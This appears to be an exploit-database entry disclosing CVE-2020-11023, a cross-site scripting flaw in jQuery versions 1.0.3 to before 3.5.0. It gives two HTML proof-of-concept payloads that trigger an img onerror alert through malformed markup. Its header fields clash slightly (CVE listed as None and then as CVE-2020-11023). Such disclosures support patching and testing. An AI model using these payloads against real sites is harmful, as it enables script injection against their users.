jQuery 1.0.3 - Cross-Site Scripting (XSS)

2021-04-14
ID: 104239
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 04/29/2020
# Exploit Author: Central InfoSec
# Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0
# CVE : CVE-2020-11023

# Proof of Concept 1:
<style><style /><img src=x onerror=alert(1)>

# Proof of Concept 2 (Only jQuery 3.x affected):
<img alt="<x" title="/><img src=x onerror=alert(1)>">
1-4-2 (www02)